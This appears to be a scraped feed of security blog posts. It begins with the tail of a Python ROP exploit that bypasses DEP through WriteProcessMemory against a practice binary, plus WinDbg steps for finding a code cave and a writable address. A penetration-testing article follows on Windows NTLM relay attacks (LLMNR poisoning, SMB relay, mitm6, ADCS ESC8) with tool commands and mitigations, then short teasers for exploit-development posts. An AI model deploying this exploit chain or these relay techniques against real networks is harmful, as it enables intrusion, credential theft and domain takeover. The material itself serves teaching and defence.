	0x42424242, # dummy lpBuffer (write what) 
	0x43434343, # dummy nSize
	writeable,  # lpNumberOfBytesWritten
]

rop_setup = [
	# Get a pointer to the skeleton
	0x4CBFB + binary_base,  # pop eax (will be dereferenced by a side effect gadget)
	writeable,
	0x683da + binary_base,  # push esp ; add dword [eax], eax ; pop ecx; ret; 
	0x704F4 + binary_base,  # pop eax; ret;
	0x4bb2d + binary_base,  # 0x448 (offset to skeleton on stack)
	0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
	0x7609f + binary_base,  # add eax, 4; ret;
	0x3039f + binary_base,  # mov edx, eax; mov eax, esi; pop esi; ret;
	0x41414141,
	0x31564 + binary_base, 	# sub ecx, edx; cmp ecx, eax; sbb eax, eax; inc eax; pop ebp; (add offset to skeleton, ecx holds ptr to skeleton now) 
	0x41414141,

	# Write WriteProcessMemory address to skeleton+0
	0x704F4 + binary_base,	# pop eax; ret;
	0x9015C + binary_base,	# IAT CreateFile
	0x2BB8E + binary_base,  # mov eax, dword ptr [eax] // dereference IAT to get lib ptr
	0x636a2 + binary_base, 	# pop edx; ret;
	0xfffee370, 			# -00011c90, offset from WriteFile to WriteProcessMemory
	0x59a05 + binary_base, 	# sub eax, edx; pop ebp; ret;
	0x41414141,
	0x7ab35 + binary_base, 	# mov dword ptr [ecx], eax; pop ebp; ret;

	# Move skeleton pointer ahead 
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 4
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 8
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 12
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0;
	0x0582b + binary_base, # inc ecx; ret 0; 16
	0x0582b + binary_base,

	# Write shellcode address to skeleton dummy value
	0x16238 + binary_base, # mov eax, ecx; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x62646 + binary_base, # add eax, 0x7f; ret;
	0x4d1ed + binary_base, # sub eax, 0x30; pop ebp; ret;
	0x41414141,
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x76096 + binary_base, # add eax, 8; ret;
	0x7ab35 + binary_base, # mov dword ptr [ecx], eax; pop ebp; ret;
	0x41414141,

	# Write size (0x401) to skeleton dummy value
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x0582b + binary_base, 	# inc ecx; ret 0;
	0x704F4 + binary_base,  # pop eax
	0x19b3  + binary_base,  # addr of 0x401;
	0x2bb8e + binary_base,  # mov eax, dword ptr [eax]; ret;
	0x7ab35 + binary_base,  # mov dword ptr [ecx], eax; pop ebp; ret;
	0x41414141,

	 # Move ecx back to skeleton & pivot stack there to execute the function
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x15935 + binary_base,	# dec ecx; ret;
	0x8b299 + binary_base, 	# mov esp, ecx; ret;
]

rop1 = b""
# add skeleton
for g in skeleton:
	  rop1 += p32(g)
# add ropnops (stack pivot not exact)
rop1 += p32(binary_base + 0x159d)*(24) # ropnop
# add rop shellcode decoder
rop1 += rop_decoder()
# fill up with ropnops until pivot gadget
for i in range(0, offset-len(rop1)-4, 4):
	  rop1 += p32(0x159d + binary_base) # ropnop
# jump over pivot gadget
rop1 += p32(0x3da53 + binary_base) # add esp, 0x10; ret;

rop2 = b""
rop2 += p32(binary_base + 0x159d)*(10) # ropnop
for g in rop_setup:
	print(hex(g))
	rop2 += p32(g)

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop1
buf += b"B" * 4
buf += pivot
buf += rop2
buf += sc
buf += b"D" * (size-len(buf))
p.sendline(buf)

input("Press enter to continue..")
p.close() 

Misc

Finding a codecave

A codecave is an (executable) memory area of a binary that is unused and can be used to host attacker provided code. We can find the code section as follows:

0:001> dd filesrv + 3c L1
3fab003c  000000f8
0:001> dd filesrv + f8 + 2c L1
3fab0124  00001000
0:001> ? filesrv+1000
Evaluate expression: 1068175360 = 3fab1000
0:001> !vprot 3fab1000
BaseAddress:       3fab1000
AllocationBase:    3fab0000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY
RegionSize:        0008f000
State:             00001000  MEM_COMMIT
Protect:           00000020  PAGE_EXECUTE_READ
Type:              01000000  MEM_IMAGE

Now we can use some unused area between 3fab1000 and 3fab1000+0008f000=3FB40000. A good candidate to look is towards the end – but really you can use anything if you are confident the binary does not crash when you overwrite it or you don’t care.

Finding a writable address

Often you need writeable addresses when calling Windows API functions because they return data that way. To find one we can look at the .data section & chose something that is likely not used:

!dh filesrv
...
SECTION HEADER #3
   .data name
    332C virtual size
   A6000 virtual address
    1E00 size of raw data
   A5400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
...
0:001> ? filesrv + A6000 + 332C + 4
Evaluate expression: 1068864304 = 3fb59330
0:001> dd 3fb59330
3fb59330  00000000 00000000 00000000 0000000
!vprot 3fb59330
BaseAddress:       3fb59000
AllocationBase:    3fab0000
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY
RegionSize:        00001000
State:             00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              01000000  MEM_IMAG

Finding ROP Gadgets

I had a lot of success with ropper and its interactive console. Another good alternative is rp++.

References

This binary was used for a vulnerable machine on the vulndev discord server that is available for patreon subscribers.

The post Bypassing DEP with WriteProcessMemory (x86) appeared first on Vulndev.

Network Relaying Abuse in a Windows Domain

31 August 2022 at 09:00

Network relaying abuse in the context of a legacy Windows authentication protocol is by no means a novel vector for privilege escalation in a domain context. However, in spite of these techniques being well understood and documented for many years, it is unfortunately still common during the course of an internal network penetration test for Nettitude consultants to escalate from a low privileged user to Domain Admin in a matter of hours (or even minutes). This is due to a handful of Active Directory and internal network misconfigurations which this article will explore.

Through the course of four scenarios, we’ll cover both longstanding and more recent attack primitives that center around relaying techniques in the hopes that network defenders can apply the mitigations contained therein.

Scenario 1 – LLMNR/NBT-NS Poisoning

Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are alternative resolution protocols used to derive a machine’s IP address given its hostname on the network.

LLMNR, which is based upon the DNS format, enables name resolution on link local scenarios and has been around since the dawn of Windows Vista. It is the spiritual successor to NBT-NS, which uses a system’s NetBIOS name to identity it on the network.

In general, name resolution (NR) protocols stand as the final fallback should suitable records not be found in local host files, DNS caches, or the configured DNS servers. One can think of the purpose of NR protocols as allowing a host to broadly query its neighbors over multicast: “Hey, does anyone have x resource, as I can’t find it anywhere else?”

These broadcasts are sent out to the entire intranet; however, no measures are taken to verify the integrity of the response of addresses and the address providers on the network, since Microsoft views the network as a trust boundary; as such, malicious actors can take advantage of essentially a race-condition and interpose themselves as an authoritative source for name resolution by replying to LLMNR (UDP 5355)/NBT-NS (UDP 137) requests with popular opensource offensive tooling such as Responder. Crucially, if the requested resource requires authentication, the victim’s username and NetNTLM hash are summarily sent to the adversary’s spoofed authoritative node.

Mistyping, misconfigurations (either on the DNS server or client side), WPAD, or even Google Chrome can easily lead to a scenario in which the client machine relies on multicast name resolution queries and gifts a malicious man-in-the-middle its coveted hash.

In this demonstration, the attacker sets up Responder listening on eth0 and with the -wF flags to start the WPAD rogue proxy server and force NTLM authentication on wpad.dat file retrieval:

Shortly thereafter, the victim (on client01 at 192.168.136.133) requests a shared resource via SMB with an unfortunate misspelling:

As demonstrated below, the attacker then responds to the name resolution query initiated by the victim via LLMNR, naming himself as the recipient and receiving the victim’s credentials in return:

From here, the user’s hash can either be cracked offline using a hash cracker like Hashcat or possibly relayed further in the environment to authenticate to other network resources via relay attacks, should mitigations such as SMB signing be disabled.

Mitigations:

  1. Open the Group Policy Editor and navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client
  2. Ensure that the option “Turn OFF Multicast Name Resolution” is enabled.
  3. To disable NBT-NS on Windows clients:
  4. Open your Network Connections and view the properties of the network adapter.
  5. Select TCP//IPv4 and select “Properties.”
  6. Select “Advanced” on the “General” tab and navigate to the WINS tab, then choose “Disable NetBIOS over TCP/IP.”

Scenario 2 – NetNTLM Relay over SMB

Continuing our exploitation of the potential consequences of LLMNR and NBT-NS broadcast traffic being present in the target environment, let’s turn our attention to relaying the NetNTLM hashes previously captured by Responder and see if more damage can be done.

Much like wine and cheese, Responder and Ntlmrelayx from the Impacket suite are the perennial pairing here. The idea is that an attacker can opt to relay captured NetNTLM hash to any systems on the network that have SMB signing turned off, which is the default setting on Windows clients.

After configuring Responder with its SMB and HTTP server deactivated (which can typically be done by editing /etc/responder/Responder.conf) and running the module via CLI as before (responder -I eth0 -wF), the attacker can then set up ntlmrelayx to listen for incoming connections with smb2 support enabled:

Text Description automatically generated

In this simulated scenario, an administrator on DC01 (192.168.136.132) mistypes a network share, which leads to a successful relay of the NetNTLM hash to client01 (192.168.136.133) and the dumping of the SAM, or the Security Account Manager, which is a database present on Windows machines that stores local user accounts and authentication information:

Timeline Description automatically generated

Do be advised that from MS08-068 and onwards, it is impossible to relay the same NetNTLM hash to the originating machine from which it was issued; as such, in order for this attacker to work, it is necessary to relay the hash originating from DC01 to client01.

Apart from dumping the computer’s SAM, which is disastrous in and of itself, an attacker could also elect to execute arbitrary commands on the target system or even spawn an SMB session on the host, which is what shall be demonstrated next. Upon successful relay of the administrator hash to client01, a malicious actor is presented with an interactive SMB client shell on 127.0.0.1:1000 after specifying the -i flag when deploying ntlmrelayx:

Text Description automatically generated

From here, the attacker has full access to the C$ drive and can amplify their foothold on the network by deploying a remote access trojan (RAT) or even proliferating ransomware through the network’s file system:

Graphical user interface, text Description automatically generated

Mitigations:

  1. The steadfast advice from Microsoft when it comes to any variant of the classic NTLM relay attack is to migrate from the natively vulnerable NTLM challenge-response authentication to the far more secure method of Kerberos authentication when possible. Kerberos has been Microsoft’s preferred replacement for NTLM since the inception of Windows 2000.
  2. For those organizations that must use NTLM in their environments, it is recommended that EPA (Extended Protection for Authentication) and SMB signing are enabled, which in conjunction can vastly blunt the possibility of NTLM relay attacks.

Scenario 3 – IPv6 Carnage

Another common man-in-the-middle privilege escalation vector that poses risk an enterprise domain context stems from the abuse of IPv6, which is enabled by default on modern Windows operating systems and takes precedence over its predecessor IPv4 since the release of Vista. As such, systems internally poll the network for IPv6 leases, which plays into an attack vector still ripe with potential in 2022. For a step-by-step breakdown of how this all works:

  1. An IPv6 client periodically sends out solicit packets on the local network, seeking an IPv6 router.
  2. When an IPv6 router is present, it sends out an advertise packet in response to the solicit packet. This advertise packet informs the client that the IPv6 router is available for DHCP services.
  3. The IPv6 client replies with a request packet to the DHCPv6 server, asking for an IPv6 configuration.
  4. Finally, the DHCPv6 server issues the IPv6 configuration to the IPv6 client, which specifies several things, including the IP address, default gateway, DNS servers, etc. This is all included in the reply packet.

The idea with this attack, which utilizes Dirk-jan Mollema’s excellent research from 2018, is that a malicious actor can interpose their machine as an IPv6 router and force authentication to their server as the authoritative DNS server on the network over any other IPv4 servers. The attacker can then in tandem utilize ntlmrelayx to relay captured credentials to the specified target machine, leading to dumping of sensitive domain information or possibly even the addition of additional computer accounts or escalated privileges.

To set up this scenario, mitm6 is launched listening on eth0 and targeting the lab.local domain along with the machine client01:

Shortly thereafter, the preferred IPv6 DNS server is displayed from the perspective of the command prompt of our client01 victim as being the attacker’s machine, where 192.168.136.132 is the IPv4 address of the lab.local domain controller:

From here, ntlmrelayx is launched targeting the relay to the domain controller with the following command, with the -6 flag ensuring that our ntlmrelayx listens for both IPv4 and IPv6 connections and the -wh flag specifying a non-existent WPAD file host:

ntlmrelayx.py -6 -t ldap://192.168.136.132 wh netti-wpad.lab.local -l loot

After simulating the client machine rebooting and joining the network, it is observed that the attack successfully relays the client01 machine account against the DC:

Text Description automatically generated

This enables the attacker to gather and enumerate valuable information against the target domain environment, including group memberships, domain policies, and sensitive information disclosed in any AD object’s description fields, as demonstrated below:

It should be remarked that, while the scenario of the service account password being exposed in cleartext in the AD object’s description field is contrived for this example, it is unfortunately a practice that is still observed in modern-day engagements.

Now, while the aforementioned information dump about the targeted AD objects is certainly valuable, things can take a decisive turn for the worst should an attacker set up the ntlmrelay over LDAPS. Relaying to LDAP over TLS offers an opportunity for quick compromise of an entire domain, as creating new accounts is not possible over unencrypted connections. Specifying the --delegate-access flag on ntlmrelayx and waiting for the victim to request an IPv6 address or a WPAD configuration leads to the following series of events in the attacker’s console:

Once the victim requests a new IPv6 address or WPAD configuration from the mitm6 server (this is often seen when the victim reboots their machine or plugs in their network cable again), the ntlmrelayx server receives the connection and creates a new computer account over LDAPS, which is permitted by the default AD setting which dictates that any domain user can add up to 10 computer accounts:

From here, the malicious actor can utilize getST.py from the impacket suite to take advantage of a classic resource-based constrained delegation attack vector in order to have the new computer account request service tickets for itself on behalf of any other user in the domain, including the administrator. The typical flow of this attack finishes with requesting a TGS for the CIFS service of the target computer impersonating the domain administrator and dumping the SAM with impacket’s secretdump.py module, as previously demonstrated. In case the reader needs a refresher on the meaning of terms like TGS or a primer on Kerberos-based attacks, please consult this excellent resource as additional reading.

Should a user with functional permissions of domain admin log into one of the workstations in scope of the mitm6 attack, ntlmrelayx can be further weaponized to create a new enterprise administrator user; below, the domain administrator “henry” logs into the target machine, after which the authentication is relayed against the domain controller of the target environment:

Further in the output below, ntlmrelayx adds a new user with Replication-Get-Changes-All privileges:

Text Description automatically generated

At this point, it is game over for the domain’s integrity. An attacker can achieve complete domain compromise by dumping all domain user hashes from the Ntds.dit file, which is essentially the database at the heart of active directory:

Chart Description automatically generated with low confidence

Now that the wide-ranging ramifications of a simple IPv6 network configuration being left in its default state have been fully explored, let’s turn to discussing mitigating the factors that make this attack chain possible. Owing to the fact that there were several components abused along the way, there are several mitigation aspects to address.

Mitigations:

In summary, the mitm6 tool abuses the fact that Windows by default queries for an IPv6 address even in IPv4-only environments. If IPv6 is not internally in use, the surest way to prevent mitm6 attacks is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. However, entirely disabling IPv6 entirely may have unwanted side effects. As outlined in the linked article source below verbatim, setting the following predefined rules to Block instead of Allow prevents the attack from working:

  • (Inbound) Core Networking – Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)
  • (Inbound) Core Networking – Router Advertisement (ICMPv6-In)
  • (Outbound) Core Networking – Dynamic Host Configuration Protocol for IPv6(DHCPV6-Out)

Mitigating WPAD abuse:

If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service.

Mitigating relaying to LDAP:

Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding.

Mitigating resource-based delegation abuse:

As RBCD is a part and parcel of intended Kerberos functionality, there is no one-click mitigation here. Most of the attack surface can however be reduced by adding administrative and key users to the Protected Users group or by marking the account as sensitive and ineligible for delegation.

Scenario 4 – Nothing but Certified Trouble

In the summer of 2021, SpecterOps researchers Will Schroeder and Lee Christensen published a deluge of information on the attack potential in inherently insecure Active Directory Certificate Services (hereafter ADCS, essentially Microsoft’s PKI implementation). While a full discussion of the eight attack mappings (ESC1 through ESC8) is outside of the scope of this blog post, it is worthwhile to explore ESC8 further as it stands as an excellent recent example of the continued potential for domain compromise that NTLM relay poses.

Essentially, this vulnerability arises from the fact that the web interface of the ADCS allows NTLM authentication by default and does not enforce relay mitigations by default. If the certificate authority in the domain does indeed have the web enrolment feature enabled (which is exposed typically via http://<CA_SERVER/certsrv/ upon the Certificate Authority Web Enrolment role being installed on the server), then the attacker can carry out an NTLM relay to the HTTP endpoint. Per the linked SpecterOps resource:

“This attack, like all NTLM relay attacks, requires a victim account to authenticate to an attacker-controlled machine. An attacker can coerce authentication by many means, but a simple technique is to coerce a machine account to authenticate to the attacker’s host using the MS-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex) methods using a tool like SpoolSample or Petitpotam. The attacker can then use NTLM relay to impersonate the machine account and request a client authentication certificate (e.g., the default Machine/Computer template) as the victim machine account. If the victim machine account can perform privileged actions such as domain replication (e.g., domain controllers or Exchange servers), the attacker could use this certificate to compromise the domain. Otherwise, the attacker could logon as the victim machine account and use S4U2Self as previously described to access the victim machine’s host OS.”

With the theory out of the way, let’s see this attack in action. First, from their initial foothold on the client01 machine as a low-privileged user, the attacker can utilize the living-off-the-land binaries, like certutil.exe, to enumerate certificate authorities in the domain:

From here, the attacker can set up ntlmrelayx to forward incoming forced authentications from DC01 to the HTTP endpoint for certificate enrolment; note that ExAdndroidDev’s fork of Impacket with support for ADCS exploitation was utilized for this demonstration:

As the final step in the attack chain, the PowerShell implementation of PetitPotam is leveraged in order to coerce an authentication from DC01 to our relay server:

At this point, the CA issues a certificate for the DC01$ computer account, which is captured by the ntlmrelayx server:

Now that the hard work is done, from here, with the base64 certificate of the domain controller computer account in hand, the attacker can use Rubeus to request a Kerberos TGT for the DC01$ computer account and can now perform a DCSync to request the NTLM hash of the krbtgt user to achieve complete domain compromise and persistence.

Mitigations:

  1. Prior to releasing the offensive tooling for ADCS exploitation, SpecterOps released the PSPKIAudit auditing toolkit to enable defenders to proactively monitor their environments for potential ADCS misconfigurations. Please do recall that there are seven other scenarios for ADCS abuse which are outlined in the original SpecterOps whitepaper and not discussed in this blog post, so concerned blue team individuals are encouraged to read more here.
  2. Alongside reviewing the aforementioned resources, it is highly recommended that defenders enumerate the Web Enrolment interfaces in their environment (either with or without PSPKIAudit) and either enforce HTTPS and enable EPA on the IIS server endpoints or remove the endpoints if possible altogether.
  3. If not already doing so, defenders are encouraged to treat CA servers as tier 0 assets along with domain controllers from an asset management standpoint.

Conclusion

Owing to the fact that an attacker would need to have successfully leveraged another server-side vulnerability or a social-engineering attack to be in the position to relay credentials as a man-in-the-middle, hardening domain authentication and superfluous network broadcast traffic stands as an important component of Defence in Depth (DiD). While Microsoft may have worked to address the impact of some of these relay issues at different levels, it is nonetheless paramount that network administrators and defenders do their part to blunt the force of these vectors to potential domain takeover by following the mitigation advice on the subject. As there is no silver bullet to pre-emptively thwart every network attack primitive, the remedial guidance contained in this article can be followed as part of the multifaceted approach of DiD to secure the digital estate from domain compromise. Nettitude’s specialized internal infrastructure penetration testing services can also provide network stakeholders with world-class technical knowledge and tailored advice on remediating the issues explored here and beyond.

The post Network Relaying Abuse in a Windows Domain appeared first on Nettitude Labs.

Browser Exploitation: Firefox Integer Overflow – CVE-2011-2371

By: voidsec
21 July 2022 at 08:37

In case you’re wondering why I’m not posting as regularly as before, with the new year, I’ve finally transitioned into a fully offensive vulnerability research and exploit development role at Exodus Intelligence that fulfilled my career dream (BTW, we’re currently hiring). In the last couple of months, I’ve worked on some exciting and challenging bugs. […]

The post Browser Exploitation: Firefox Integer Overflow – CVE-2011-2371 appeared first on VoidSec.

Windows Drivers Reverse Engineering Methodology

By: voidsec
20 January 2022 at 15:30

With this blog post I’d like to sum up my year-long Windows Drivers research; share and detail my own methodology for reverse engineering (WDM) Windows drivers, finding some possible vulnerable code paths as well as understanding their exploitability. I’ve tried to make it as “noob-friendly” as possible, documenting all the steps I usually perform during […]

The post Windows Drivers Reverse Engineering Methodology appeared first on VoidSec.

Driver Buddy Reloaded

By: voidsec
27 October 2021 at 14:30

As part of my continuous security research journey, during this year I’ve spent a good amount of time reverse-engineering Windows drivers and exploiting kernel-mode related vulnerabilities. While in the past there were (as far as I know), at least two good IDA plugins aiding in the reverse engineering process: DriverBuddy of NCC Group. win_driver_plugin of […]

The post Driver Buddy Reloaded appeared first on VoidSec.

Root Cause Analysis of a Printer’s Drivers Vulnerability CVE-2021-3438

By: voidsec
28 July 2021 at 12:00

Last week SentinelOne disclosed a “high severity” flaw in HP, Samsung, and Xerox printer’s drivers (CVE-2021-3438); the blog post highlighted a vulnerable strncpy operation with a user-controllable size parameter but it did not explain the reverse engineering nor the exploitation phase of the issue. With this blog post, I would like to analyse the vulnerability […]

The post Root Cause Analysis of a Printer’s Drivers Vulnerability CVE-2021-3438 appeared first on VoidSec.

Exploiting System Mechanic Driver

By: voidsec
14 April 2021 at 13:30

Last month we (last & VoidSec) took the amazing Windows Kernel Exploitation Advanced course from Ashfaq Ansari (@HackSysTeam) at NULLCON. The course was very interesting and covered core kernel space concepts as well as advanced mitigation bypasses and exploitation. There was also a nice CTF and its last exercise was: “Write an exploit for System […]

The post Exploiting System Mechanic Driver appeared first on VoidSec.

SLAE – Assignment #7: Custom Shellcode Crypter

By: voidsec
2 April 2020 at 14:55

Assignment #7: Custom Shellcode Crypter Seventh and last SLAE’s assignment requires to create a custom shellcode crypter. Since I had to implement an entire encryption schema both in python as an helper and in assembly as the main decryption routine, I’ve opted for something simple. I’ve chosen the Tiny Encryption Algorithm (TEA) as it does […]

The post SLAE – Assignment #7: Custom Shellcode Crypter appeared first on VoidSec.

SLAE – Assignment #6: Polymorphic Shellcode

By: voidsec
2 April 2020 at 14:39

Assignment #6: Polymorphic Shellcode Sixth SLAE’s assignment requires to create three different (polymorphic) shellcodes version starting from published Shell Storm’s examples. I’ve decided to take this three in exam: http://shell-storm.org/shellcode/files/shellcode-752.php – linux/x86 execve (“/bin/sh”) – 21 bytes http://shell-storm.org/shellcode/files/shellcode-624.php – linux/x86 setuid(0) + chmod(“/etc/shadow”,0666) – 37 bytes http://shell-storm.org/shellcode/files/shellcode-231.php – linux/x86 open cd-rom loop (follows “/dev/cdrom” symlink) […]

The post SLAE – Assignment #6: Polymorphic Shellcode appeared first on VoidSec.

❌
❌